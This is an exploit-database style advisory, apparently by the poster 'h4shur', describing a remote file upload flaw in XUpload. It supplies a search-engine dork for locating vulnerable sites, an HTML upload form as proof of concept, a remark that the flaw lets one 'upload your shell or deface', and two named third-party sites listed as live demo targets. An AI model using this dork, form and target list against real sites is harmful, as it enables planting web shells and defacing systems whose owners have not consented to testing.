# Title: XUpload Remote File Upload Vulnerability # Author: h4shur # date: 2020-11-04 # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Powered by XUpload" ### NOTE: * You can bypass it to upload your shell or deface. ### POC: * Exploit 1 : site.com/[folder]/[file] <form enctype="multipart/form-data" action="/cgi-bin/upload.cgi?upload_id=" method="post" onSubmit="return StartUpload(this);" target="xupload"> Send file: <input name="file_1" type="file" onChange="checkExt(this.value)"><br> Comment: <input type="text" name="comment">(optional) <br><br> <Input type="checkbox" name="popup"><label FOR="popup" ACCESSKEY="Z">Show upload status in pop-up window</label><br> <br> <input type="submit" value="Upload File"> </form> ### Demo: * http://www.satyrlp.sorokine.fr * http://50.116.78.206/uploadtest/upload_form.html ### Contact Me : * Telegram : @h4shur * Email : [email protected] * Instagram : @netedit0r * twitter : @h4shur